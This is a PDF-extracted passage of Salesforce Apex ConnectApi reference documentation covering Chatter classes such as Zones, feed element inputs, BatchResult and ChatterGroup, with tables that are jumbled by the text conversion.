Namespace
ConnectApi
UserProfiles Methods
The following are methods for UserProfiles. All methods are static.
970
Reference
Zones Class
IN THIS SECTION:
getUserProfile(String, String)
Returns the user profile of the context user.
getUserProfile(String, String)
Returns the user profile of the context user.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserProfile getUserProfile(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.UserProfile
Zones Class
Access information about Chatter Answers zones in your organization. Zones organize questions into logical groups, with each zone
having its own focus and unique questions.
Namespace
ConnectApi
Zones Methods
The following are methods for Zones. All methods are static.
971
Reference
Zones Class
IN THIS SECTION:
getZone(String, String)
Returns a specific zone based on the zone ID.
getZones(String)
Returns a paginated list of zones.
getZones(String, Integer, Integer)
Returns a paginated list of zones with the specified page and page size.
searchInZone(String, String, String, ConnectApi.ZoneSearchResultType)
Search a zone by keyword. Specify whether to search articles or questions.
searchInZone(String, String, String, ConnectApi.ZoneSearchResultType, String, Integer)
Search a zone by keyword. Specify whether to search articles or questions and specify the page of information to view and the page
size.
getZone(String, String)
Returns a specific zone based on the zone ID.
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.Zone getZone(String communityId, String zoneId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
zoneId
Type: String
The ID of a zone.
Return Value
Type: ConnectApi.Zone
getZones(String)
Returns a paginated list of zones.
972
Reference
Zones Class
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.ZonePage getZones(String communityId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.ZonePage
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.Zone getZones(String communityId, Integer pageParam, Integer
pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
973
Reference
Zones Class
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ZonePage
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.ZoneSearchPage searchInZone(String communityId, String zoneId,
String q, ConnectApi.ZoneSearchResultType filter)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
zoneId
Type: String
zoneIdThe ID of a zone.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
filter
Type: ConnectApi.ZoneSearchResultType
A ZoneSearchResultType enum value. One of the following:
ArticleSearch results contain only articles.
QuestionSearch results contain only questions.
974
Reference
Zones Class
Return Value
Type: ConnectApi.ZoneSearchPage
SEE ALSO:
setTestSearchInZone(String, String, String, ConnectApi.ZoneSearchResultType, ConnectApi.ZoneSearchPage)
Testing ConnectApi Code
API Version
29.0
Requires Chatter
No
Signature
public static ConnectApi.ZoneSearchPage searchInZone(String communityId, String zoneId,
String q, ConnectApi.ZoneSearchResultType filter, String pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
zoneId
Type: String
zoneIdThe ID of a zone.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
filter
Type: ConnectApi.ZoneSearchResultType
A ZoneSearchResultType enum value. One of the following:
ArticleSearch results contain only articles.
QuestionSearch results contain only questions.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
975
Reference
Zones Class
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ZoneSearchPage
SEE ALSO:
setTestSearchInZone(String, String, String, ConnectApi.ZoneSearchResultType, String, Integer, ConnectApi.ZoneSearchPage)
Testing ConnectApi Code
API Version
29.0
Signature
public static Void setTestSearchInZone(String communityId, String zoneId, String q,
ConnectApi.ZoneSearchResultType filter, ConnectApi.ZoneSearchPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
zoneId
Type: String
zoneIdThe ID of a zone.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
filter
Type: ConnectApi.ZoneSearchResultType
976
Reference
Zones Class
Type: ConnectApi.ZoneSearchPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchInZone(String, String, String, ConnectApi.ZoneSearchResultType)
Testing ConnectApi Code
API Version
29.0
Signature
public static Void setTestSearchInZone(String communityId, String zoneId, String q,
ConnectApi.ZoneSearchResultType filter, String pageParam, Integer pageSize,
ConnectApi.ZoneSearchPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
zoneId
Type: String
zoneIdThe ID of a zone.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
filter
Type: ConnectApi.ZoneSearchResultType
A ZoneSearchResultType enum value. One of the following:
977
Reference
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.ZoneSearchPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchInZone(String, String, String, ConnectApi.ZoneSearchResultType, String, Integer)
Testing ConnectApi Code
ConnectApi.AnnouncementInput Class
An announcement displays in a designated location in the Salesforce UI until 11:59 p.m. on its expiration date, unless its deleted or
replaced by another announcement.
Property
Type
Description
Available
body
ConnectApi.Message
SegmentInput
31.0
expirationDate Datetime
978
Reference
Property
Type
Description
Available
ConnectApi.BinaryInput Class
Create a ConnectApi.BinaryInput object to attach files to feed items and comments.
The constructor is:
ConnectApi.BinaryInput(blob, contentType, filename)
Type
Description
Available Version
blob
Blob
28.0
contentType
String
28.0
filename
String
28.0
ConnectApi.BatchInput Class
Construct a set of inputs to be passed into a method at the same time.
Use this constructor when there isnt a binary input:
ConnectApi.BatchInput(Object input)
Type
Description
input
Object
binary
ConnectApi.BinaryInput
32.0
binaries
32.0
979
Available
Version
Reference
ConnectApi.BookmarksCapabilityInput
Create or update a bookmark on a feed element.
This class is a subclass of ConnectApi.FeedElementCapabilityInput Class.
Property
Type
isBookmarked Boolean
ByCurrentUser
Description
Required or
Optional
Available Version
No
32.0
ConnectApi.CanvasAttachmentInput Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, use ConnectApi.CanvasCapabilityInput.
Used to attach a canvas app to a feed item.
Subclass of ConnectApi.FeedItemAttachmentInput Class
Property
Type
Description
Available Version
description
String
29.031.0
developerName
String
29.031.0
height
String
Optional. The height of the canvas app in pixels. Default height is 200
pixels.
29.031.0
namespacePrefix String
String
Optional. Parameters passed to the canvas app in JSON format. Example: 29.031.0
parameters
{'isUpdated'='true'}
thumbnailUrl
String
29.031.0
title
String
29.031.0
ConnectApi.CanvasCapabilityInput
Create or update a canvas app associated with a feed element.
This class is a subclass of ConnectApi.FeedElementCapabilityInput Class.
Property
Type
Description
Required or
Optional
Available Version
description
String
Optional
32.0
980
Reference
Property
Description
Required or
Optional
Available Version
developerName String
Required
32.0
String
Optional
32.0
Optional
32.0
height
Type
namespacePrefix String
parameters
String
32.0
thumbnailUrl
String
Optional
32.0
title
String
Required
32.0
ConnectApi.ChatterGroupInput Class
Property
Type
Description
Available
announcement
String
31.0
Boolean
description
String
29.0
information
ConnectApi.
Group
Information
Input
28.0
isArchived
Boolean
29.0
isAuto
Boolean
ArchiveDisabled
true if automatic archiving is turned off for the group, false 29.0
otherwise. Defaults to false.
name
String
29.0
owner
String
29.0
visibility
ConnectApi.
Specifies the group visibility type.
GroupVisibilityType PrivateAccessOnly members of the group can see
29.0
981
Reference
Property
Type
Description
Available
ConnectApi.CommentInput Class
Used to add rich comments, for example, comments that include @mentions or attachments.
Property
Type
Description
Available
Version
attachment
NewFileAttachmentInput
LinkAttachmentInput is not permitted for
comments.
Important: As of version 32.0, use the
capabilities property.
body
capabilities
ConnectApi.
Optional. Specifies any capabilities for the comment,
CommentCapabilities such as a file attachment.
Class
32.0
ConnectApi.ContentAttachmentInput Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, use ConnectApi.ContentCapabilityInput.
Used to attach existing content to a comment or feed item.
Subclass of ConnectApi.FeedItemAttachmentInput Class
Property
Type
contentDocumentId String
Description
Available Version
28.031.0
ConnectApi.ContentCapabilityInput
Attach or update a file with a feed element. Use this class to attach a new file or update a file that has already been uploaded to Salesforce.
This class is a subclass of ConnectApi.FeedElementCapabilityInput Class.
982
Reference
Property
Type
contentDocumentId String
Description
Required or
Optional
description
String
title
String
Title of the file. This value is used as the file Required for new
name for new content. For example, if the content
title is My Title, and the file is a .txt file, the
file name is My Title.txt.
Available Version
32.0
32.0
ConnectApi.DatacloudOrderInput Class
Input representation for DatacloudOrder to purchase contacts or companies and retrieve purchase information.
You can purchase contacts or companies in a single order. You cant mix contactIds and companyIds in the same order.
Property
Type
Description
Required or
Optional
Available
Version
companyIds
String
A comma-separated list of
identification numbers for the
companies to be purchased.
Required
32.0
contactIds
String
A comma-separated list of
identification numbers for the
contacts to be purchased.
Required
32.0
userType
ConnectDatacloudUserTypeEnum
Required
32.0
Monthly (default)
Listpool
ConnectApi.FeedElementCapabilitiesInput
A container for all capabilities that can be included when creating a new feed element.
In API versions 30.0 and earlier, every feed item supported comments, likes, topics, and so on. In versions 31.0 and later, every feed item
(and feed element) can have a unique set of capabilities. If a capability property exists on a feed element, that capability is available, even
if the capability property doesnt have a value. For example, if the ChatterLikes capability property exists on a feed element (with
or without a value), the context user can like that feed element. If the capability property doesnt exist, it isnt possible to like that feed
element. A capability can also contain associated data. For example, the Moderation capability contains data about moderation
flags.
983
Reference
Property
Type
bookmarks
Description
Required or
Optional
Available Version
ConnectApi.
Describes bookmarks added to this feed
BookmarksCapability element.
Input
Optional
32.0
canvas
ConnectApi.
Describes a canvas app added to this feed
CanvasCapability element.
Input
Optional
32.0
content
ConnectApi.
Describes content added to this feed
ContentCapability element.
Input
Optional
32.0
link
ConnectApi.
Describes a link added to this feed element. Optional
LinkCapabilityInput
32.0
poll
ConnectApi.
Describes a poll added to this feed element. Optional
PollCapabilityInput
32.0
questionAnd
Answers
ConnectApi.
Describes a question and answer capability Optional
QuestionAndAnswers added to this feed element.
CapabilityInput
32.0
ConnectApi.FeedElementCapabilityInput Class
A feed element capability.
In API versions 30.0 and earlier, every feed item supported comments, likes, topics, and so on. In versions 31.0 and later, every feed item
(and feed element) can have a unique set of capabilities. If a capability property exists on a feed element, that capability is available, even
if the capability property doesnt have a value. For example, if the ChatterLikes capability property exists on a feed element (with
or without a value), the context user can like that feed element. If the capability property doesnt exist, it isnt possible to like that feed
element. A capability can also contain associated data. For example, the Moderation capability contains data about moderation
flags.
This class is abstract.
This class is a superclass of:
ConnectApi.BookmarksCapabilityInput
ConnectApi.CanvasCapabilityInput
ConnectApi.ContentCapabilityInput
ConnectApi.LinkCapabilityInput
ConnectApi.PollCapabilityInput
ConnectApi.QuestionAndAnswersCapabilityInput
ConnectApi.FeedElementInput Class
Feed elements are the top-level items that a feed contains. Feeds are feed element containers.
This class is abstract.
984
Reference
Type
Description
Available Version
capabilities
ConnectApi.
The capabilities that define auxiliary information on 31.0
FeedElementCapabilities this feed element.
feedElementType
ConnectApi.
FeedElementType
subjectId
String
31.0
ConnectApi.FeedItemAttachmentInput Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, use ConnectApi.FeedElementCapabilityInput
Class.
Used to attach a file to a feed item.
This class is abstract and has no public constructor. You can make an instance only of a subclass.
Superclass for:
ConnectApi.CanvasAttachmentInput Class
ConnectApi.ContentAttachmentInput Class
ConnectApi.LinkAttachmentInput Class
ConnectApi.NewFileAttachmentInput Class
ConnectApi.PollAttachmentInput Class
ConnectApi.FeedItemInput Class
Used to add rich feed items, for example, feed items that include @mentions or files. Also used to bookmark a feed item.
Subclass of ConnectApi.FeedElementInput Class as of version 31.0.
Property
Type
Description
attachment
ConnectApi.Feed
ItemAttachment
Input Class
Specifies the attachment for the feed item. The feed item type 28.031.0
is inferred based on the provided attachment.
ConnectApi.
MessageBodyInput
Class
body
Available
Version
985
28.0
Reference
Property
Type
isBookmarked Boolean
ByCurrentUser
Description
Available
Version
28.031.0
property.
original
String
FeedElementId
original
FeedItemId
String
visibility
ConnectApi.
FeedItem
VisibilityType
31.0
28.031.0
Enum
28.0
ConnectApi.GroupInformationInput Class
Property
Type
Description
Available Version
text
String
28.0
title
String
28.0
ConnectApi.HashtagSegmentInput Class
Used to include a hashtag in a feed item or comment.
Subclass of ConnectApi.MessageSegmentInput Class
Property
Type
Description
Available Version
tag
String
28.0
ConnectApi.LinkAttachmentInput Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, use ConnectApi.LinkCapabilityInput.
Used as part of a feed item attachment, to add links.
986
Reference
Type
Description
Available Version
url
String
28.031.0
urlName
String
28.031.0
ConnectApi.LinkCapabilityInput
Create or update a link on a feed element.
This class is a subclass of ConnectApi.FeedElementCapabilityInput Class.
Property
Type
Description
Required or
Optional
Available Version
url
String
32.0
urlName
String
32.0
Optional
ConnectApi.LinkSegmentInput Class
Used to include a link segment in a feed item or comment.
Subclass of ConnectApi.MessageSegmentInput Class
Property
Type
Description
Available Version
url
String
28.0
ConnectApi.ManagedTopicPositionCollectionInput Class
A collection of relative positions of managed topics.
Property
Type
Description
Required or
Optional
managedTopic
Positions
987
Available Version
32.0
Reference
ConnectApi.ManagedTopicPositionInput Class
Relative position of a managed topic.
Property
Type
managedTopicId String
position
Integer
Description
Required or
Optional
Available Version
Required
32.0
32.0
ConnectApi.MentionSegmentInput Class
Used to include an @mention of a user or a group in a feed item or a comment. The maximum number of mentions you can include in
a feed item or comment is 25.
Subclass of ConnectApi.MessageSegmentInput Class
Property
Type
Description
Available Version
id
String
28.0
Groups are available in 29.0
ConnectApi.MessageBodyInput Class
Used to add rich messages to feed items and comments.
Property
Type
messageSegments List<ConnectApi.
MessageSegment
Input Class>
Description
Available Version
28.0
ConnectApi.MessageSegmentInput Class
Used to add rich message segments to feed items and comments.
This class is abstract and has no public constructor. You can make an instance only of a subclass.
Superclass for:
ConnectApi.HashtagSegmentInput Class
ConnectApi.LinkSegmentInput Class
ConnectApi.MentionSegmentInput Class
ConnectApi.TextSegmentInput Class
988
Reference
ConnectApi.NewFileAttachmentInput Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, use ConnectApi.ContentCapabilityInput.
Describes a new file to be attached to a feed item. The actual binary file, that is the attachment, is provided as part of the BinaryInput in
the method that takes this attachment input, such as postFeedItem or postComment.
Subclass of ConnectApi.FeedItemAttachmentInput Class
Property
Type
Description
Available Version
description
String
28.031.0
title
String
The title of the file. This value is required and is also used as the file 28.031.0
name. For example, if the title is My Title, and the file is a .txt file, the
file name is My Title.txt.
ConnectApi.PhotoInput Class
Use to specify how crop a photo. Use to specify an existing file (a file that has already been uploaded).
Property
Type
Description
Available version
cropSize
Integer
29.0
cropX
Integer
The position X, in pixels, from the left edge of the image to the start of
the crop square. Top left is position (0,0).
29.0
cropY
Integer
The position Y, in pixels, from the top edge of the image to the start of
the crop square. Top left is position (0,0).
29.0
fileId
String
18 character ID of an existing file. The key prefix must be 069 and the file 25.0
size must be less than 2 MB.
Note: Images uploaded on the Group page and on the User page
dont have file IDs and therefore cant be used.
versionNumber
Integer
Version number of the existing content. If not provided, the latest version 25.0
is used.
ConnectApi.PollAttachmentInput Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, use ConnectApi.PollCapabilityInput.
Used to attach a poll to a feed item.
Subclass of ConnectApi.FeedItemAttachmentInput Class
Property
Type
Description
Available Version
pollChoices
List<String> The text labels for the poll items. Polls must contain between 2 to 10 poll 28.031.0
choices.
989
Reference
ConnectApi.PollCapabilityInput
Create, update, or vote on a poll on a feed element.
This class is a subclass of ConnectApi.FeedElementCapabilityInput Class.
Property
Type
Description
Required or
Optional
choices
List<String>
The choices used to create a new poll. You Required for creating 32.0
must specify 210 poll choices for each poll. a poll
myChoiceId
String
Available Version
32.0
ConnectApi.QuestionAndAnswersCapabilityInput
Create a question feed element or set the best answer of the existing question feed element.
This class is a subclass of ConnectApi.FeedElementCapabilityInput Class.
Property
Type
Description
bestAnswerId
String
32.0
32.0
questionTitle String
Required or
Optional
Optional
Available Version
ConnectApi.TextSegmentInput Class
Used to include a text segment in a feed item or comment.
Subclass of ConnectApi.MessageSegmentInput Class
Property
Type
Description
Available Version
text
String
Plain text for this segment. If hashtags or links are detected in text,
28.0
they are included in the comment as hashtag and link segments. Mentions
are not detected in text and are not separated out of the text. Mentions
require ConnectApi.MentionSegmentInput Class.
ConnectApi.TopicInput Class
Update a topics name or description.
Property
Type
Description
Available Version
description
String
29.0
990
Reference
Property
Type
Description
Available Version
name
String
29.0
Use this property to change only the capitalization and spacing of the
topic name.
ConnectApi.UserInput Class
Used to update a user.
Property
Type
Description
Available Version
aboutMe
String
ConnectApi.AbstractMessageBody Class
This class is abstract.
Superclass of:
ConnectApi.FeedBody Class
ConnectApi.MessageBody Class
Name
Type
messageSegments List<ConnectApi.
MessageSegment>
text
String
Description
Available
Version
28.0
Display-ready text. Use this text if you dont want to process 28.0
the message segments.
ConnectApi.AbstractRecommendation Class
A recommendation.
Superclass of:
ConnectApi.EntityRecommendation Class
ConnectApi.NonEntityRecommendation Class
991
Reference
Property Name
Type
Description
Available Version
explanation
ConnectApi.
Recommendation
Explanation
32.0
recommendationType ConnectApi.
Specifies the type of record being recommended.
RecommendationType
32.0
ConnectApi.AbstractRecommendationExplanation Class
Explanation for a recommendation.
Superclass of ConnectApi.RecommendationExplanation Class.
Property Name
Type
Description
Available Version
summary
String
32.0
type
ConnectApi.
Recommendation
ExplanationType
32.0
992
Reference
Property Name
Type
Description
Available Version
UserFollowedTogetherUsers often
followed at the same time as other users the
context user follows
UserFollowsSameUsersUsers who
follow the same users as the context user
UserManagerThe context users manager
UserNewRecently created users
UserPeerUsers who report to the same
manager as the context user
UserPopularUsers with many followers
UserViewingSameRecordsUsers who
view the same records as the context user
ConnectApi.AbstractRecordField Class
This class is abstract.
Superclass of:
ConnectApi.BlankRecordField Class
ConnectApi.LabeledRecordField Class
A field on a record object.
Message segments in a feed item are typed as ConnectApi.MessageSegment. Feed item capabilities are typed as
ConnectApi.FeedItemCapability. Record fields are typed as ConnectApi.AbstractRecordField. These classes
are all abstract and have several concrete subclasses. At runtime you can use instanceof to check the concrete types of these objects
and then safely proceed with the corresponding downcast. When you downcast, you must have a default case that handles unknown
subclasses.
Important: The composition of a feed may change between releases. Your code should always be prepared to handle instances
of unknown subclasses.
Name
Type
Description
Available Version
type
String
29.0
Address
Blank
Boolean
Compound
CreatedBy
Date
DateTime
Email
LastModifiedBy
993
Reference
Name
Type
Description
Available Version
Location
Name
Number
Percent
Phone
Picklist
Reference
Text
Time
ConnectApi.AbstractRecordView Class
This class is abstract.
Subclass of ConnectApi.ActorWithId Class
Superclass of:
ConnectApi.RecordSummary Class
ConnectApi.RecordView Class
A view of any record in the organization, including a custom object record. This object is used if a specialized object, such as User or
ChatterGroup, is not available for the record type.
Name
Type
Description
Available Version
name
String
29.0
ConnectApi.Actor Class
This class is abstract.
Superclass of:
ConnectApi.ActorWithId Class
ConnectApi.UnauthenticatedUser Class
Name
Type
Description
Available Version
name
String
28.0
type
String
28.0
file
group
unauthenticateduser
user
994
Reference
Name
Type
Description
Available Version
ConnectApi.ActorWithId Class
This class is abstract.
Subclass of: ConnectApi.Actor Class
Superclass of:
ConnectApi.AbstractRecordView Class
ConnectApi.ChatterGroup Class
ConnectApi.File Class
ConnectApi.User Class
Name
Type
Description
Available Version
id
String
Actors 18-character ID
28.0
motif
ConnectApi. An icon that identifies the actor as a user, group, file, or custom
28.0
object. The icon isnt the user or group photo, and it isnt a preview
Motif
of the file. The motif can also contain the objects base color.
mySubscription ConnectApi. If the context user is following the item, this contains information
Reference about the subscription, else returns null.
28.0
recordViewUrl
String
The URL of the Chatter REST API record view resource for this record, 30.0
or null if this record does not have a record view layout, or if
Connect Records API is not enabled for this organization, or if the
record type isnt supported.
url
String
28.0
ConnectApi.Address Class
Name
Type
Description
Available Version
city
String
28.0
country
String
28.0
28.0
formattedAddress String
state
String
28.0
street
String
Street number
28.0
zip
String
28.0
995
Reference
ConnectApi.Announcement
An announcement displays in a designated location in the Salesforce UI until 11:59 p.m. on its expiration date, unless its deleted or
replaced by another announcement.
Name
Type
Description
expirationDate Datetime
feedElement
Available Version
ConnectApi.
The feed element that contains the body of the
31.0
FeedElement Class announcement and its associated comments, likes, and so
on.
String
id
31.0
ConnectApi.AnnouncementPage
A collection of announcements.
Name
Type
Description
announcements
List<ConnectApi
.Announcement>
currentPageUrl String
Available Version
31.0
String
Chatter REST API URL identifying the next page or null if 31.0
there isnt a next page.
previousPageUrl String
Chatter REST API URL identifying the previous page or null 31.0
if there isnt a previous page.
nextPageUrl
ConnectApi.ApprovalAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.ApprovalCapability Class is
used.
Subclass of ConnectApi.FeedItemAttachment Class
Name
Type
Description
Available Version
id
String
28.031.0
28.031.0
postTemplateFields List
<ConnectApi.
ApprovalPost
TemplateField>
996
Reference
Name
Type
Description
Available Version
process
String
InstanceStepId
30.031.0
status
28.031.0
ConnectApi.
WorkflowProcess
Status Enum
Approved
Fault
Held
NoResponse
Pending
Reassigned
Rejected
Removed
Started
ConnectApi.ApprovalCapability Class
If a feed element has this capability, it includes information about an approval.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
id
String
The work item ID. The work item ID is null if there 32.0
isnt a pending work item associated with the
approval record.
postTemplate
Fields
List<ConnectApi.
processInstance
StepId
String
status
ConnectApi.
WorkflowProcess
Status
32.0
ApprovalPost
TemplateField>
32.0
ConnectApi.ApprovalPostTemplateField Class
Name
Type
Description
Available Version
displayName
String
28.0
displayValue
String
28.0
997
Reference
Name
Type
Description
Available Version
record
ConnectApi. A record ID
28.0
Reference If no record exists or if the reference is null, this value is null.
ConnectApi.ArticleItem Class
Article item in question and answers suggestions.
Property Name
Type
Description
Available Version
id
String
Id of the article.
32.0
rating
Double
32.0
title
String
32.0
urlLink
String
32.0
viewCount
Integer
32.0
ConnectApi.BannerCapability Class
If a feed element has this capability, it has a banner motif and style.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
motif
31.0
style
31.0
Possible value:
AnnouncementAn announcement displays
in a designated location in the Salesforce UI until
11:59 p.m. on its expiration date, unless its
deleted or replaced by another announcement.
ConnectApi.BasicTemplateAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.EnhancedLinkCapability is
used.
Subclass of ConnectApi.FeedItemAttachment Class
Objects of this type are returned by attachments in feed items with type BasicTemplate.
Property
Type
Description
Available
Version
description
String
28.031.0
998
Reference
Property
Type
Description
Available
Version
icon
28.031.0
linkRecordId
String
28.031.0
linkUrl
String
title
String
ConnectApi.BatchResult
The result of an operation returned by a batch method.
Namespace
ConnectApi
Usage
Calls to batch methods return a list of BatchResult objects. Each element in the BatchResult list corresponds to the strings
in the list parameter passed to the batch method. The first element in the BatchResult list matches the first string passed in the
list parameter, the second element corresponds with the second string, and so on. If only one string is passed, the BatchResult list
contains a single element.
Example
The following example shows how to obtain and iterate through the returned ConnectApi.BatchResult objects. The code
adds two group IDs to a list. One of group IDs is incorrect, which causes a failure when the code calls the batch method. After it calls the
batch method, it iterates through the results to determine whether the operation was successful or not for each group ID in the list. The
code writes the ID of every group that was processed successfully to the debug log. The code writes an error message for every failed
group.
This example generates one successful operation and one failure.
List<String> myList = new List<String>();
// Add one correct group ID.
myList.add('0F9D00000000oOT');
// Add one incorrect group ID.
myList.add('0F9D00000000izf');
ConnectApi.BatchResult[] batchResults = ConnectApi.ChatterGroups.getGroupBatch(null,
myList);
// Iterate through each returned result.
for (ConnectApi.BatchResult batchResult : batchResults) {
if (batchResult.isSuccess()) {
999
Reference
IN THIS SECTION:
BatchResult Methods
BatchResult Methods
The following are instance methods for BatchResult.
IN THIS SECTION:
getError()
If an error occurred, returns a ConnectApi.ConnectApiException object providing the error code and description.
getErrorMessage()
Returns a String that contains an error message.
getErrorTypeName()
Returns a String that contains the name of the error type.
getResult()
Returns an object that contains the results of the batch operation. The object is typed according to the batch method. For example,
if you call getMembershipBatch(), a successful call to BatchResult getResult() returns a
ConnectApi.GroupMembership object.
isSuccess()
Returns a Boolean that is set to true if the batch operation was successful for this object, false otherwise.
getError()
If an error occurred, returns a ConnectApi.ConnectApiException object providing the error code and description.
Signature
public ConnectApi.ConnectApiException getError()
1000
Reference
Return Value
Type: ConnectApi.ConnectApiException
getErrorMessage()
Returns a String that contains an error message.
Signature
public String getErrorMessage()
Return Value
Type: String
Usage
Note that the error message wont make a round trip through a Visualforce view state, because exceptions cant be serialized.
getErrorTypeName()
Returns a String that contains the name of the error type.
Signature
public String getErrorTypeName()
Return Value
Type: String
getResult()
Returns an object that contains the results of the batch operation. The object is typed according to the batch method. For example, if
you call getMembershipBatch(), a successful call to BatchResult getResult() returns a
ConnectApi.GroupMembership object.
Signature
public Object getResult()
Return Value
Type: Object
isSuccess()
Returns a Boolean that is set to true if the batch operation was successful for this object, false otherwise.
1001
Reference
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
ConnectApi.BlankRecordField Class
Subclass of ConnectApi.AbstractRecordField Class
A record field displayed as a place holder in a grid of fields.
ConnectApi.BookmarksCapability Class
If a feed element has this capability, the current user can bookmark it.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
isBookmarked
ByCurrentUser
Boolean
32.0
ConnectApi.BundleCapability Class
If a feed element has this capability, it has a container of feed elements called a bundle.
This class is abstract.
Subclass of ConnectApi.FeedElementCapability Class.
Superclass of:
ConnectApi.GenericBundleCapability Class
ConnectApi.TrackedChangeBundleCapability
.
Property Name
Type
Description
Available Version
bundleType
ConnectApi.BundleType Defines this feed element's bundle type. The bundle 31.0
ConnectApi.
FeedElementPage
totalElements
Integer
1002
31.0
Reference
ConnectApi.CanvasCapability Class
If a feed element has this capability, it renders a canvas app.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
description
String
developerName
String
32.0
height
String
32.0
icon
ConnectApi.Icon
32.0
namespacePrefix
String
32.0
parameters
String
32.0
thumbnailUrl
String
title
String
32.0
ConnectApi.CanvasTemplateAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.CanvasCapability Class is used.
Subclass of ConnectApi.FeedItemAttachment Class
Objects of this type are returned by attachments in feed items with type CanvasPost.
Property
Type
Description
Available Version
description
String
Optional. Description of the canvas app. The maximum length of this 29.031.0
field is 500 characters.
developerName
String
height
String
Optional. The height of the canvas app in pixels. Default height is 200 29.031.0
pixels.
icon
29.031.0
29.031.0
namespacePrefix String
String
Optional. Parameters passed to the canvas app in JSON format. Example: 29.031.0
parameters
{'isUpdated'='true'}
thumbnailUrl
String
1003
29.031.0
Reference
Property
Type
Description
Available Version
title
String
Specifies the title of the link used to call the canvas app.
29.031.0
ConnectApi.CaseComment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.CaseCommentCapability Class
is used.
Subclass of ConnectApi.FeedItemAttachment Class
Objects of this type are returned by attachments in feed items with type CaseCommentPost.
Name
Type
actorType
Enum
Description
Available
Version
28.031.0
createdBy
28.031.0
createdDate
Datetime
28.031.0
id
String
Comments 18character ID
28.031.0
published
Boolean
28.031.0
text
String
Comments text
28.031.0
ConnectApi.CaseCommentCapability Class
If a feed element has this capability, it has a case comment on the case feed.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
actorType
ConnectApi.
CaseActorType
createdBy
32.0
comment.
createdDate
Datetime
32.0
eventType
ConnectApi.
CaseComment
EventType
32.0
1004
Reference
Property Name
Type
Description
Available Version
id
String
32.0
published
Boolean
text
String
32.0
ConnectApi.ChatterActivity Class
Name
Type
Description
Available
Version
commentCount
Integer
28.0
commentReceivedCount Integer
likeReceivedCount Integer
postCount
Integer
28.0
ConnectApi.ChatterConversation Class
Name
Type
Description
Available Version
conversationId String
29.0
conversationUrl String
29.0
members
29.0
messages
ConnectApi.
Chatter
MessagePage
29.0
read
Boolean
29.0
ConnectApi.ChatterConversationPage Class
Name
Type
Description
Available
Version
conversations
List<ConnectApi.Chatter
ConversationSummary>
29.0
1005
Reference
Name
Type
Description
Available
Version
currentPageToken String
29.0
currentPageUrl String
29.0
nextPageToken
String
nextPageUrl
String
29.0
ConnectApi.ChatterConversationSummary Class
Name
Type
Description
Available
Version
id
String
29.0
latestMessage
ConnectApi.ChatterMessage
29.0
members
read
Boolean
url
String
29.0
29.0
ConnectApi.ChatterGroup Class
This class is abstract.
Subclass of ConnectApi.ActorWithId Class
Superclass of:
ConnectApi.ChatterGroupDetail Class
ConnectApi.ChatterGroupSummary Class
Name
Type
Description
Available
Version
additional
Label
String
An additional label for the group, for example, Archived, Private, or Private 30.0
With Customers. If there isnt an additional label, the value is null.
announcement
ConnectApi.
Announcement
canHave
ChatterGuests
Boolean
1006
28.0
Reference
Name
Type
Description
Available
Version
community
ConnectApi.
Reference
28.0
description
String
Groups description
28.0
30.0
emailTo
String
ChatterAddress
29.0
isAuto
Boolean
ArchiveDisabled
29.0
lastFeedElement Datetime
PostDate
31.0
Datetime
28.030.0
isArchived
lastFeedItem
PostDate
Boolean
Returns null if Chatter emails and posting to Chatter by email arent both
enabled in your organization.
Use lastFeedElementPosted.
memberCount
Integer
28.0
myRole
